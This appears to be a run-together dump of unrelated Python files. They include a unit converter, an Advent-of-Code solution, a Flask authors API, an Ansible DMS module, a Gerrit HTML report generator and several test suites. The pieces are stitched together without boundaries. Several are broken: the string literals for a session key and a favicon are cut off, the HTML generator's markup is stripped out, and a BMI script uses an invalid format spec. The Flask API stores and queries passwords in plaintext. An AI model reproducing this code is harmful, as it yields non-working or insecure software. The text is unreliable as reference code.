value) such as: convert('volume', 'oz', 'cc', 25) :param unit_type: the type of the unit: 'mass', 'length', etc. :param unit1: the unit the original value is in :param unit2: the unit you want the value converted to :param value: the original value """ if unit_type is None: # the new API: no need to specify unit type unit1, unit2 = (Simplify(s) for s in (unit1, unit2)) try: unit_type = UNIT_TYPES[unit1] except KeyError: raise NotSupportedUnitError(unit1) try: unit_type2 = UNIT_TYPES[unit2] except KeyError: raise NotSupportedUnitError(unit2) if unit_type != unit_type2: raise UnitConversionError("Cannot convert {0} to {1}" .format(unit1, unit2)) unit_type = Simplify(unit_type) else: # the old API: specify the unit type # re-defining the inputs: unit_type, unit1, unit2, value = unit1, unit2, value, unit_type unit_type, unit1, unit2 = (Simplify(s) for s in (unit_type, unit1, unit2)) try: Converter = Converters[unit_type] except KeyError: raise InvalidUnitTypeError(unit_type) return Converter.Convert(unit1, unit2, value) # so as to have the old, non-PEP8 compatible name # This is used by TapInput (any more???) def Convert(*args, **kwargs): """ so as to have the old, non-PEP8 compatible name This is used by TapInput (any more???) for new code, use convert() """ warnings.warn('"Convert" is deprecated -- use "convert()"', DeprecationWarning) return convert(*args, **kwargs) # fixme: we should probably simjply get rid of these and use ValueError class UnitConversionError(ValueError): """ Exception type for unit conversion errors Perhaps this should be subclassed more, but at the moment, it doesn't do anything special """ pass class NotSupportedUnitError(UnitConversionError): def __init__(self, unit): self.unit = unit def __str__(self): return ('The unit: {} is not supported or not recognized' .format(self.unit)) class InvalidUnitError(UnitConversionError): """ Exception raised when a unit is not in the Unit conversion database """ def __init__(self, unit_unit_type): if isinstance(unit_unit_type, (list, tuple)): (unit, unit_type) = unit_unit_type[:2] self.unit = unit self.type = unit_type if unit_type else "" else: super(InvalidUnitError, self).__init__(unit_unit_type) def __str__(self): if hasattr(self, 'unit'): return ('The unit: {} is not in the list for Unit Type: {}' .format(self.unit, self.type)) else: return super(InvalidUnitError, self).__str__() class InvalidUnitTypeError(UnitConversionError): """ Exception raised when a unit is not in the Unitconversion database """ def __init__(self, unitType): self.unitType = unitType def __str__(self): return ('The unit type: {} is not in the UnitConversion database' .format(self.unitType)) xman/chunk.py from typing import Iterable, Sequence def send_chunked_response(wfile, content: bytes): content_chunks: Iterable[bytes] = chunks(content, 512) for chunk in content_chunks: tosend = ('%X' % len(chunk)).encode('utf-8') + b'\r\n' + chunk + b'\r\n' wfile.write(tosend) wfile.write('0\r\n\r\n'.encode('utf-8')) def chunks(lst: Sequence, n: int) -> Iterable: for i in range(0, len(lst), n): yield lst[i:i + n] from typing import List import os EMPTY_OCTO = 0 FULL_OCTO = 10 class Board(object): def __init__(self): self.__board = [] self.total_flashes = 0 def __str__(self): return "\n".join( [" ".join([str(cell) for cell in row]) for row in self.__board] ) def add_row(self, row: List[int]): self.__board.append(row) def is_all_zeros(self): return all(all(cell == 0 for cell in row) for row in self.__board) def inc_energy(self, row_idx, col_idx, count_zeros): if row_idx < 0 or row_idx >= len(self.__board): return if col_idx < 0 or col_idx >= len(self.__board[0]): return if not count_zeros and self.__board[row_idx][col_idx] == EMPTY_OCTO: return self.__board[row_idx][col_idx] = min( self.__board[row_idx][col_idx] + 1, FULL_OCTO ) def charge_vicinity(self, row_idx, col_idx): # charge neighbours for dy in [-1, 0, +1]: for dx in [-1, 0, +1]: if dy == dx == 0: continue self.inc_energy(row_idx + dy, col_idx + dx, count_zeros=False) def step(self): # 1. Inc energy for each octopus by 1 for row_idx in range(len(self.__board)): for col_idx in range(len(self.__board[row_idx])): self.inc_energy(row_idx, col_idx, count_zeros=True) # 2. Flash octopuses while True: must_flash = set() for row_idx in range(len(self.__board)): for col_idx in range(len(self.__board[row_idx])): if self.__board[row_idx][col_idx] != FULL_OCTO: continue must_flash.add((row_idx, col_idx)) self.__board[row_idx][col_idx] = EMPTY_OCTO if not must_flash: break self.total_flashes += len(must_flash) for coords in must_flash: self.charge_vicinity(*coords) def silver(board: Board): for _ in range(100): board.step() return board.total_flashes def gold(board: Board): step = 1 while True: board.step() if board.is_all_zeros(): break step += 1 return step def parse(lines: List[str]): board = Board() for line in lines: board.add_row(list(map(int, line.strip()))) return board def solve(): lines = open(os.path.join(os.path.dirname(__file__), "input"), "rt").readlines() return "DAY 11", silver(parse(lines)), gold(parse(lines)) bindata.py #!/usr/bin/env python3 import sys print('package main') print() print('var bindata = map[string][]byte{') for line in sys.stdin: dest, fname = line.strip().split(None, 1) # print('//', repr(dest), repr(fname), file=sys.stderr) with open(fname, 'rb') as f: print('\t', '"', dest, '": []byte("', sep='', end='') print(''.join('\\x{:02x}'.format(c) for c in f.read()), end='') print('"),') pass print('}') Python/Desafios/tarefas/exe 43 IMC.py1-10 P = float(input('qual seu peso (kg) >')) H = float(input('qual sua altura (m) >')) i = P/ (H ** 2) def e(estado): print('o seu IMC e {:.f2}'.format(i)) print('você esta {}'.format(estado)) if i < 18.5: e('abaixo do peso') elif 18.5 < i < 25: e('peso ideal') elif 25 < i < 30: e('acima do peso') elif 30 < i < 40: e('obesidade') else: e('obesidade morbida') #!/usr/bin/env python import json import requests import sys base_url = "https://fndca3b.fnal.gov:3880/api/v1/bulk-requests" if __name__ == "__main__": session = requests.Session() session.verify = "/etc/grid-security/certificates" session.cert = "/tmp/x509up_u8637" session.key = " headers = { "accept" : "application/json", "content-type" : "application/json"} data = { "target" : sys.argv[1], "activity" : "PIN", "clearOnSuccess" : True, "clearOnFailure" : True, "expandDirectories" : None, "arguments": { "lifetime": 24, "lifetime-unit": "HOURS" } } r = session.post(base_url, data = json.dumps(data), headers=headers) r.raise_for_status() print (r.status_code, r.headers['request-url']) 0 import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sn df = pd.read_csv('data_preparation/Diabetes.csv') print(df.head(),"\n\n") cols = [c for c in df.columns if c not in ["Pregnancies","Outcome"]] df_copy = df.copy() df_copy[cols] = df_copy[cols].replace({0: np.NaN}) print(df_copy.head(),"\n\n") print(df_copy.info()) #Scatter matrix pd.plotting.scatter_matrix(df_copy,figsize=(7,7)) df2 = df_copy.dropna() colors = df2["Outcome"].map(lambda x:"#44d9ff" if x else "#f95b4a") pd.plotting.scatter_matrix(df2,figsize=(7,7),color=colors) '''The file defines the author api This api will only return authors' id, name and gs_link ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - GET /api/authors/id return the specific author - GET /api/authors/ return all - GET /api/authors/?group_id= return authors inside the group - POST /api/authors/ - registration request body with the json - 203 register successfully - 409 conflict data or illegal parameter ''' from subprocess import Popen from flask import (Blueprint, request, jsonify, g, abort, session, redirect, url_for) from flask.views import MethodView from .sessions import select_authors, SessionView ALLOWED_FIELDS = "id, name, gs_link" def select_author_by_id(author_id): sql = "SELECT " + ALLOWED_FIELDS + " FROM authors WHERE id=%s" with g.db.cursor() as cursor: cursor.execute(sql, (author_id,)) author = cursor.fetchone() return author def select_all_authors(): sql = "SELECT " + ALLOWED_FIELDS + " FROM authors WHERE is_registered=True" with g.db.cursor() as cursor: cursor.execute(sql) authors = cursor.fetchall() return authors def select_authors_by_group(group_id): sql = ("SELECT " + ALLOWED_FIELDS + " FROM authors_and_groups " "INNER JOIN authors ON author_id=id WHERE group_id=%s AND is_registered=True") with g.db.cursor() as cursor: #print(cursor.mogrify(sql, (group_id,))) cursor.execute(sql, (group_id,)) authors = cursor.fetchall() return authors def insert_author(author): sql = ("INSERT INTO authors (name, account, password, " "gs_link) VALUES (%s, %s, %s, %s)") with g.db.cursor() as cursor: cursor.execute(sql, (author['name'], author['account'], author['password'], author['gs_link'],) ) sql = "SELECT * FROM authors WHERE account=%s AND password=%s" cursor.execute(sql, (author['account'], author['password'])) author = cursor.fetchone() g.db.commit() return author def insert_author_with_code(author): sql = ("UPDATE authors SET name=%s, account=%s, password=%s, gs_link=%s, " "is_registered=1 WHERE id=%s") with g.db.cursor() as cursor: cursor.execute(sql, (author['name'], author['account'], author['password'], author['gs_link'], author['invitation_code'],)) sql = "SELECT * FROM authors WHERE account=%s AND password=%s" cursor.execute(sql, (author['account'], author['password'])) author = cursor.fetchone() g.db.commit() return author def insert_raw_author(): sql = "INSERT INTO authors (is_registered) VALUES (0)" with g.db.cursor() as cursor: cursor.execute(sql) g.db.commit() sql = "SELECT LAST_INSERT_ID()" cursor.execute(sql) return cursor.fetchone()['LAST_INSERT_ID()'] def update_gs_link(data): sql = "UPDATE authors SET gs_link=%s WHERE id=%s" with g.db.cursor() as cursor: cursor.execute(sql, (data['gs_link'], data['id'])) sql = "DELETE FROM authors_and_papers WHERE author_id=%s" cursor.execute(sql, (data['id'],)) g.db.commit() class AuthorView(MethodView): def get(self, author_id = None): if author_id != None: author = select_author_by_id(author_id) return jsonify(author) group_id = request.args.get('group_id', None) if group_id: authors = select_authors_by_group(group_id) else: authors = select_all_authors() return jsonify(authors) def post(self): author = request.get_json() if author['invitation_code']: author = insert_author_with_code(author) else: author = insert_author(author) Popen(["python", "web/spiders/AuthorSpider.py", author['gs_link'], str(author['id']) ] ) # redirect with HTTP method preserved # https://stackoverflow.com/questions/15473626/make-a-post-request-while-redirecting-in-flask return redirect('api/sessions/', code=307) def put(self): data = request.get_json() if 'id' not in session: return ("", 404, {}) data['id'] = session['id'] if data['type'] == "gs_link": update_gs_link(data) Popen(["python", "web/spiders/AuthorSpider.py", data['gs_link'], str(data['id']) ] ) else: pass return ("", 200, {}) authors_blueprint = Blueprint('authors', __name__, url_prefix='/api') authors_view = AuthorView.as_view('authors') authors_blueprint.add_url_rule('/authors/', view_func=authors_view, methods=['GET']) authors_blueprint.add_url_rule('/authors/', view_func=authors_view, methods=['GET', 'POST', 'PUT']) # The MIT License (MIT). # Copyright (c) 2015, & contributors. from imapfw.interface import implements, checkInterfaces from imapfw.conf import Parser from .interface import ActionInterface # Annotations. from imapfw.annotation import ExceptionClass @checkInterfaces() @implements(ActionInterface) class UnitTests(object): """Run all the unit tests.""" honorHooks = False requireRascal = False def __init__(self): self._suite = None self._exitCode = 1 def exception(self, e: ExceptionClass) -> None: raise def getExitCode(self) -> int: return self._exitCode def init(self, parser: Parser) -> None: import unittest self._suite = unittest.TestSuite() # Load all available unit tests. from imapfw.testing.concurrency import TestConcurrency from imapfw.testing.rascal import TestRascal from imapfw.testing.folder import TestFolder from imapfw.testing.message import TestMessage, TestMessages from imapfw.testing.maildir import TestMaildirDriver from imapfw.testing.edmp import TestEDMP from imapfw.testing.types import TestTypeAccount, TestTypeRepository from imapfw.testing.architect import TestArchitect, TestDriverArchitect from imapfw.testing.architect import TestDriversArchitect from imapfw.testing.architect import TestEngineArchitect self._suite.addTest(unittest.makeSuite(TestConcurrency)) self._suite.addTest(unittest.makeSuite(TestRascal)) self._suite.addTest(unittest.makeSuite(TestFolder)) self._suite.addTest(unittest.makeSuite(TestMessage)) self._suite.addTest(unittest.makeSuite(TestMessages)) self._suite.addTest(unittest.makeSuite(TestMaildirDriver)) self._suite.addTest(unittest.makeSuite(TestEDMP)) self._suite.addTest(unittest.makeSuite(TestTypeAccount)) self._suite.addTest(unittest.makeSuite(TestTypeRepository)) self._suite.addTest(unittest.makeSuite(TestArchitect)) self._suite.addTest(unittest.makeSuite(TestDriverArchitect)) self._suite.addTest(unittest.makeSuite(TestDriversArchitect)) self._suite.addTest(unittest.makeSuite(TestEngineArchitect)) def run(self) -> None: import unittest runner = unittest.TextTestRunner(verbosity=2) testResult = runner.run(self._suite) if testResult.wasSuccessful(): self._exitCode = len(testResult.failures) Parser.addAction('unitTests', UnitTests, help="run the integrated unit tests") # Copyright Contributors to the Amundsen project. # SPDX-License-Identifier: Apache-2.0 from typing import Iterator, Union from datetime import datetime import yaml from feast import Client from feast.feature_table import FeatureTable from pyhocon import ConfigFactory, ConfigTree from databuilder.extractor.base_extractor import Extractor from databuilder.models.table_metadata import TableMetadata, ColumnMetadata class FeastExtractor(Extractor): """ Extracts feature tables from Feast Core service. Since Feast is a metadata store (and not the database itself), it maps the following atributes: * a database is name of feast project * table name is a name of the feature table * columns are features stored in the feature table """ FEAST_SERVICE_CONFIG_KEY = "instance_name" FEAST_ENDPOINT_CONFIG_KEY = "endpoint" DESCRIBE_FEATURE_TABLES = "describe_feature_tables" DEFAULT_CONFIG = ConfigFactory.from_dict( {FEAST_SERVICE_CONFIG_KEY: "main", DESCRIBE_FEATURE_TABLES: True} ) def init(self, conf: ConfigTree) -> None: conf = conf.with_fallback(FeastExtractor.DEFAULT_CONFIG) self._feast_service = conf.get_string(FeastExtractor.FEAST_SERVICE_CONFIG_KEY) self._describe_feature_tables = conf.get_bool( FeastExtractor.DESCRIBE_FEATURE_TABLES ) self._client = Client( core_url=conf.get_string(FeastExtractor.FEAST_ENDPOINT_CONFIG_KEY) ) self._extract_iter: Union[None, Iterator] = None def get_scope(self) -> str: return "extractor.feast" def extract(self) -> Union[TableMetadata, None]: """ For every feature table from Feast, a multiple objets are extracted: 1. TableMetadata with feature table description 2. Programmatic Description of the feature table, containing metadata - date of creation and labels 3. Programmatic Description with Batch Source specification 4. (if applicable) Programmatic Description with Stream Source specification """ if not self._extract_iter: self._extract_iter = self._get_extract_iter() try: return next(self._extract_iter) except StopIteration: return None def _get_extract_iter(self) -> Iterator[TableMetadata]: for project in self._client.list_projects(): for feature_table in self._client.list_feature_tables(project=project): yield from self._extract_feature_table(project, feature_table) def _extract_feature_table( self, project: str, feature_table: FeatureTable ) -> Iterator[TableMetadata]: columns = [] for index, entity_name in enumerate(feature_table.entities): entity = self._client.get_entity(entity_name, project=project) columns.append( ColumnMetadata( entity.name, entity.description, entity.value_type, index ) ) for index, feature in enumerate(feature_table.features): columns.append( ColumnMetadata( feature.name, None, feature.dtype.name, len(feature_table.entities) + index, ) ) yield TableMetadata( "feast", self._feast_service, project, feature_table.name, None, columns, ) if self._describe_feature_tables: created_at = datetime.utcfromtimestamp( feature_table.created_timestamp.seconds ) description = f"* Created at **{created_at}**\n" if feature_table.labels: description += "* Labels:\n" for key, value in feature_table.labels.items(): description += f" * {key}: **{value}**\n" yield TableMetadata( "feast", self._feast_service, project, feature_table.name, description, description_source="feature_table_details", ) yield TableMetadata( "feast", self._feast_service, project, feature_table.name, f'```\n{yaml.dump(feature_table.to_dict()["spec"]["batchSource"])}```', description_source="batch_source", ) if feature_table.stream_source: yield TableMetadata( "feast", self._feast_service, project, feature_table.name, f'```\n{yaml.dump(feature_table.to_dict()["spec"]["streamSource"])}```', description_source="stream_source", ) elhachimi-ch/dst1-10 import numpy as np from sklearn.feature_extraction import DictVectorizer from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer import joblib from tensorflow.keras.utils import to_categorical from .lib import Lib from sklearn.preprocessing import MinMaxScaler import nltk class Vectorizer: __vectorizer = None __matrice = None def __init__(self, documents_as_list=None, vectorizer_type='count', ngram_tuple=(1,1), space_dimension=None, dataframe=None, preprocessing=None): if documents_as_list is not None: if vectorizer_type == 'count': cv = CountVectorizer(ngram_range=ngram_tuple) matrice = cv.fit_transform(documents_as_list) self.__vectorizer = cv self.__matrice = matrice elif vectorizer_type == 'tfidf': if preprocessing is None: tfidfv = TfidfVectorizer(max_features=space_dimension, preprocessor=self.preprocessor) matrice = tfidfv.fit_transform(documents_as_list) self.__vectorizer = tfidfv self.__matrice = matrice else: tfidfv = TfidfVectorizer(max_features=space_dimension, preprocessor=preprocessing) matrice = tfidfv.fit_transform(documents_as_list) self.__vectorizer = tfidfv self.__matrice = matrice elif vectorizer_type == 'custom': features = np.vectorize(Vectorizer.get_custom_features) data = features(documents_as_list) v = DictVectorizer() matrice = v.fit_transform(data) self.__vectorizer = v self.__matrice = matrice elif vectorizer_type == 'min_max': self.__vectorizer = MinMaxScaler() self.__matrice = self.__vectorizer.fit_transform(dataframe) else: pass def get_sparse_matrix(self): return self.__matrice def get_matrix(self): return self.__matrice.toarray() def get_vectorizer(self): return self.__vectorizer def get_features_names(self): return self.__vectorizer.get_feature_names() @staticmethod def tokenizer(doc): return doc.split() @staticmethod def preprocessor(doc): """def my_tokenizer(s): return s.split() vectorizer = CountVectorizer(tokenizer=my_tokenizer) """ tokens = doc.split(' ') result = [] for p in tokens: result.append(nltk.stem.PorterStemmer().stem(p)) return ' '.join(result) @staticmethod def get_custom_features(e): e = e.lower() return { 'f1': e[0], # First letter 'f2': e[0:2], # First 2 letters 'f3': e[0:3], # First 3 letters 'l1': e[-1], 'l2': e[-2:], 'l3': e[-3:], } def get_docs_projections_as_sparse(self, documents_as_liste, projection_type='normal'): if projection_type != 'normal': documents_as_liste = np.vectorize(Vectorizer.get_custom_features)(documents_as_liste) return self.__vectorizer.transform(documents_as_liste) def save_vectorizer(self, vectorizer_path='data/vectorizer.data'): out_vectorizer_file = open(vectorizer_path, 'wb') joblib.dump(self.__vectorizer, out_vectorizer_file) out_vectorizer_file.close() def load_vectorizer(self, vectorizer_path='data/vectorizer.data'): self.__vectorizer = joblib.load(open(vectorizer_path, 'rb')) def reshape(self, new_shpae_tuple): self.__matrice = np.array(self.__matrice.reshape(new_shpae_tuple)) def get_sum_by_columns_as_list(self): count_list = np.array(self.get_sparse_matrix().sum(axis=0)) count_list = count_list.reshape(self.get_shape()[1]) return count_list def get_sum_by_rows_as_list(self): count_list = np.array(self.get_sparse_matrix().sum(axis=1)) count_list = count_list.reshape(self.get_shape()[0]) return count_list def get_shape(self): return self.__matrice.shape @staticmethod def to_one_hot(vecteur_of_categories): """converti une colone avec des categorie mais numerique en forme One Hot Encoding exemple versicolor est de label 2 se transform en [0 0 1]""" return Lib.to_categorical(vecteur_of_categories) @staticmethod def get_reshaped_matrix(matrix, new_shape_tuple): print(new_shape_tuple) new_matrix = matrix.reshape(new_shape_tuple) print('okkkk {}'.format(new_matrix.shape)) return new_matrix @staticmethod def reshape_images_for_cnn(images_as_liste): images_as_liste.reshape(images_as_liste.shape[0], images_as_liste.shape[1], images_as_liste.shape[1], 1) \ .astype('float32') import os.path import pytest from matryoshka_tester.helpers import GitRepositoryBuild GOLANG_MAX_CONTAINER_SIZE_ON_DISK = 1181116006 # 1.1GB uncompressed def test_go_size(host, container, container_runtime): assert ( container_runtime.get_image_size(container.image) < GOLANG_MAX_CONTAINER_SIZE_ON_DISK ) def test_go_version(container): assert container.version in container.connection.check_output("go version") @pytest.mark.parametrize( "container_git_clone", [ GitRepositoryBuild( repository_url="https://github.com/rancher/fleet.git", build_command="make", ).to_pytest_param() ], indirect=["container_git_clone"], ) def test_fleet(container, container_git_clone): cmd = container.connection.run(container_git_clone.test_command) assert cmd.rc == 0 @pytest.mark.parametrize( "host_git_clone", [ GitRepositoryBuild( repository_url="https://github.com/mvarlese/fleet", ).to_pytest_param() ], indirect=["host_git_clone"], ) def test_fleet(host, host_git_clone, dapper): dest, _ = host_git_clone host.run_expect( [0], f"cd {os.path.join(dest, 'fleet')} && {dapper} build && {dapper} ci", ) 0 """Validate RPKI state via Cloudflare GraphQL API.""" # Project from hyperglass.log import log from hyperglass.external._base import BaseExternal RPKI_STATE_MAP = {"Invalid": 0, "Valid": 1, "NotFound": 2, "DEFAULT": 3} RPKI_NAME_MAP = {v: k for k, v in RPKI_STATE_MAP.items()} def rpki_state(prefix, asn): """Get RPKI state and map to expected integer.""" log.debug("Validating RPKI State for {p} via AS{a}", p=prefix, a=asn) state = 3 query = 'query GetValidation {{ validation(prefix: "{prefix}", asn: {asn}) {{ state }} }}'.format( # noqa: E501 prefix=prefix, asn=asn ) try: with BaseExternal(base_url="https://rpki.cloudflare.com") as client: response = client._post("/api/graphql", data={"query": query}) validation_state = ( response.get("data", {}).get("validation", {}).get("state", "DEFAULT") ) state = RPKI_STATE_MAP[validation_state] except Exception: state = 3 log.debug( "RPKI Validation State for {p} via AS{a} is {s}", p=prefix, a=asn, s=RPKI_NAME_MAP[state], ) return state from .routes import auth #!/usr/bin/python # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. DOCUMENTATION = ''' module: dms_queue_info short_description: Get info about DMS queues extends_documentation_fragment: opentelekomcloud.cloud.otc version_added: "0.1.2" author: " (@SebastianGode)" description: - Get info about DMS queues options: queue: description: - Name or ID of a target queue. Leave it empty to query all queues. type: str required: false requirements: ["openstacksdk", "otcextensions"] ''' RETURN = ''' dms_queues: description: Dictionary of Queues returned: changed type: list sample: [ { "created": 1517385090349, "description": "", "id": "12345678-73e4-449f-a157-53d5d9900e21", "max_consume_count": null, "name": "test-test", "queue_mode": "NORMAL", "redrive_policy": null, "retention_hours": null } ] ''' EXAMPLES = ''' # Query a single DMS Queue - opentelekomcloud.cloud.dms_queue_info: queue: 'test-test' register: dms-queue ''' from ansible_collections.opentelekomcloud.cloud.plugins.module_utils.otc import OTCModule class DmsQueueInfoModule(OTCModule): argument_spec = dict( queue=dict(required=False) ) module_kwargs = dict( supports_check_mode=True ) def run(self): data = [] if self.params['queue']: queue = self.conn.dms.find_queue( name_or_id=self.params['queue'] ) if queue: dt = queue.to_dict() dt.pop('location') data.append(dt) else: self.exit( changed=False, failed=True, message=('No Queue found with ID or Name: %s' % self.params['queue']) ) else: for raw in self.conn.dms.queues(): dt = raw.to_dict() dt.pop('location') data.append(dt) self.exit( changed=False, dms_queues=data ) def main(): module = DmsQueueInfoModule() module() if __name__ == '__main__': main() matibek/request_limiter import os import unittest from typing import Optional from django.http import HttpResponse from django.test import RequestFactory from request_limiter import request_limiter, LimitedIntervalStrategy, \ LimitStrategy, LimitException, django_request_limiter os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'test_settings') req_factory = RequestFactory() class MockStrategy(LimitStrategy): def __init__(self, allow: bool): self._allow = allow def allow(self, key: Optional[str] = None) -> bool: return self._allow def get_remaining(self, key: Optional[str] = None) -> float: return 1 def clean(self): pass class TestRequestLimiterDecorator(unittest.TestCase): def test_when_strategy_not_given_uses_limited_interval_strategy(self): limiter = request_limiter() self.assertTrue(isinstance(limiter.strategy, LimitedIntervalStrategy)) def test_when_strategy_allows_invokes_function(self): @request_limiter(strategy=MockStrategy(allow=True)) def test_func() -> bool: return True self.assertTrue(test_func()) def test_when_strategy_denies_raises_exception(self): @request_limiter(strategy=MockStrategy(allow=False)) def test_func() -> bool: return True self.assertRaises(LimitException, test_func) class TestDjangoRequestLimiter(unittest.TestCase): def test_limits_based_on_ip(self): @django_request_limiter @request_limiter(strategy=LimitedIntervalStrategy(requests=1)) def test_view(request): return True res1 = test_view(req_factory.post('/test/', REMOTE_ADDR='127.0.0.1')) assert res1, 'Expected first request to work' res2 = test_view(req_factory.post('/test/', REMOTE_ADDR='127.0.0.1')) assert isinstance(res2, HttpResponse), 'Expected limit http response' assert res2.status_code == 429, 'Expected 429 response code' # change Ip res3 = test_view(req_factory.post('/test/', REMOTE_ADDR='127.0.0.2')) assert res3, 'Expected different ip request to work' 1-10 import du from du.gerrit.ChangeStatus import ChangeStatus from urllib.parse import urlparse # Base64-encoded PNG favicon FAVICON = " class HtmlGenerator: """ Human readable HTML report generator """ # Report title DEFAULT_TITLE = "Report" @staticmethod def generate(reportInfo): result = """ """ # Title result += "%s" % HtmlGenerator.DEFAULT_TITLE # Favicon result += ( """ """ % FAVICON ) # CSS result += """ """ result += """ """ result += ( '

DRepo v%s

\n' % du.__version_name__ ) result += "
" result += ( '\n' % reportInfo.manifest.selectedBuild.name ) result += ( '\n' % reportInfo.manifest.selectedBuild.root ) result += ( '\n' % ( reportInfo.userName, reportInfo.hostName, ) ) result += "
Build name %s
Build path %s
Node %s@%s

\n" # Generate a list of all the projects (with anchor links) result += "\n" result += '\n' for idx, proj in enumerate(reportInfo.projects): result += "\n" # Name result += '\n' % ( proj.manifestProject.name, proj.manifestProject.name, ) # Path result += ( '\n' % proj.manifestProject.path ) result += "\n" result += "
Project Path
%s/%s
\n" # Generate information per-project for proj in reportInfo.projects: result += HtmlGenerator.__generateProjectHtml(proj) result += "


" # Table legend result += """
Legend
Change was found on Gerrit, was not merged and the hash matches a remote patchet (most likely checked-out, or fast-forward pulled)
Change was found on Gerrit, was not merged and the commit hash wasn't matched with anything on remote (most likely cherrypicked)
Change was not found on Gerrit (possibly missing the 'Change-Id' attribute in the message)
Change was found on Gerrit and it was merged
""" result += "" return result @staticmethod def __generateProjectHtml(projectInfo): """ Generate project specific HTML @param projectInfo Project info """ result = "" remoteHttpUrl = projectInfo.manifestProject.remote.http result += "

" gerritUrl = ( "https://" + urlparse(projectInfo.manifestProject.remote.http).netloc ) # Gitweb URL for this project projectGitwebUrl = gerritUrl + "/gitweb?p=%s.git;" % ( projectInfo.manifestProject.name, ) result += '

' % projectInfo.manifestProject.name result += '%s' % ( projectGitwebUrl, projectInfo.manifestProject.name, ) result += "(" # Gitweb URL for this branch branchGitWebUrl = projectGitwebUrl + "a=shortlog;h=refs%%2Fheads%%2F%s" % ( projectInfo.manifestProject.branch, ) # Branch result += ( ' branch: %s\n' % (branchGitWebUrl, projectInfo.manifestProject.branch) ) # Tag name if projectInfo.tagInfo.headTagName: tagGitwebUrl = projectGitwebUrl + "a=tag;h=" + projectInfo.tagInfo.refHash result += ( " tag: %s\n" % (tagGitwebUrl, projectInfo.tagInfo.headTagName) ) # Head headGitWebUrl = projectGitwebUrl + "a=commit;h=" + projectInfo.tagInfo.headHash result += ( " head: %s\n" % (headGitWebUrl, projectInfo.tagInfo.headHash) ) result += ")" result += "

" result += """ """ # Generate a list of analyzed commits for commit in projectInfo.commitsInfo: result += HtmlGenerator.__generateCommitHtml( gerritUrl, projectGitwebUrl, projectInfo, commit ) result += "
Subject Commit Change Author

" return result @staticmethod def __generateCommitHtml(gerritUrl, gitwebUrl, projectInfo, commitInfo): """ Generate commit specific HTML @param gerritUrl Gerrit HTTP URL @param gitwebUrl Gitweb HTTP URL @param projectInfo Parent project info @param commitInfo Commit info """ result = "" # Default color (for commits ) changeStyle = None gerritChangeNumberText = "" commitGerritUrl = None # Commit on gerrit ? if commitInfo.gerritChangeInfo: gerritChangeNumberText = str(commitInfo.gerritChangeInfo.number) commitGerritUrl = gerritUrl + "/c/%d" % commitInfo.gerritChangeInfo.number if commitInfo.gerritChangeInfo.patchSetNumber: gerritChangeNumberText += "/" + str( commitInfo.gerritChangeInfo.patchSetNumber ) commitGerritUrl += "/%d" % commitInfo.gerritChangeInfo.patchSetNumber # We have the exact patchset number if commitInfo.gerritChangeInfo.status == ChangeStatus.MERGED: # Commit was merged changeStyle = "change_merged" else: # Commit was pulled, but not merged changeStyle = "change_pulled" else: # We found the commit on gerrit, but don't know the exact patchset (may have been cherry-picked) changeStyle = "change_cherrypicked" else: # Commit not on gerrit changeStyle = "change_local" result += '' % changeStyle # Title result += "%s" % commitInfo.title # Hash/gitweb URL commitGitwebUrl = gitwebUrl + "a=commit;h=" + commitInfo.hash result += ( ' %s' % (commitGitwebUrl, commitInfo.shortHash) ) # Change number/gerrit URL result += '' if commitGerritUrl: result += '%s' % ( commitGerritUrl, gerritChangeNumberText, ) else: result += gerritChangeNumberText result += "" # Author result += "%s" % commitInfo.author result += "" return result from sys import getsizeof import pytest from bourbaki.introspection.references import ( find_refs_by_size, find_refs_by_id, find_refs_by_type, ) l = ["foo", "bar", 1, 2, tuple(range(10))] class Foo: l = l x = 123.0 class Bar: __slots__ = ["x", "y"] def __init__(self, x): self.x = x @pytest.mark.parametrize( "obj,type_,value", [ (l, int, 1), (l, str, "foo"), (l, tuple, tuple(range(10))), (Foo, list, l), (Foo, float, 123.0), (Bar(l), list, l), ], ) def test_find_refs_by_type(obj, type_, value): refs = find_refs_by_type(obj, type_) path = next(refs) assert path(obj) == value @pytest.mark.parametrize("obj,size,value", [(l, getsizeof(tuple(range(10))), l[-1])]) def test_find_refs_by_size(obj, size, value): refs = find_refs_by_size(obj, size, attrs=False) path = next(refs) assert path(obj) == value @pytest.mark.parametrize( "obj,target,value", [(l, l[-1], l[-1]), (Foo, l, Foo.l), (Foo, Foo.x, Foo.x), (Bar(l), l, l)], ) def test_find_refs_by_id(obj, target, value): refs = find_refs_by_id(obj, target) path = next(refs) assert path(obj) == value import os import json import time import zipfile import glob import shutil import importlib from collections import OrderedDict from xml.parsers.expat import ExpatError from ejpcsvparser import parse from jatsgenerator import generate from jatsgenerator import conf as jats_conf from packagepoa import transform from packagepoa import conf as poa_conf from elifearticle.article import ArticleDate import provider.ejp as ejplib import provider.lax_provider as lax_provider from provider.storage_provider import storage_context from provider import email_provider, utils from activity.objects import Activity class activity_PackagePOA(Activity): "PackagePOA activity" def __init__(self, settings, logger, conn=None, token=None, activity_task=None): super(activity_PackagePOA, self).__init__( settings, logger, conn, token, activity_task ) self.name = "PackagePOA" self.version = "1" self.default_task_heartbeat_timeout = 30 self.default_task_schedule_to_close_timeout = 60 * 30 self.default_task_schedule_to_start_timeout = 30 self.default_task_start_to_close_timeout = 60 * 15 self.description = "Process POA zip file input, repackage, and save to S3." # Activity directories self.directories = OrderedDict( [ ("EJP_INPUT", os.path.join(self.get_tmp_dir(), "ejp_input")), ( "XML_OUTPUT", os.path.join(self.get_tmp_dir(), "generated_xml_output"), ), ("CSV", os.path.join(self.get_tmp_dir(), "csv_data")), ("CSV_TMP", os.path.join(self.get_tmp_dir(), "csv_data", "tmp")), ( "DECAPITATE_PDF", os.path.join(self.get_tmp_dir(), "decapitate_pdf_dir"), ), ("POA_TMP", os.path.join(self.get_tmp_dir(), "tmp")), ("OUTPUT", os.path.join(self.get_tmp_dir(), "output_dir")), ] ) # Create an EJP provider to access S3 bucket holding CSV files self.ejp = ejplib.EJP(settings, self.get_tmp_dir()) 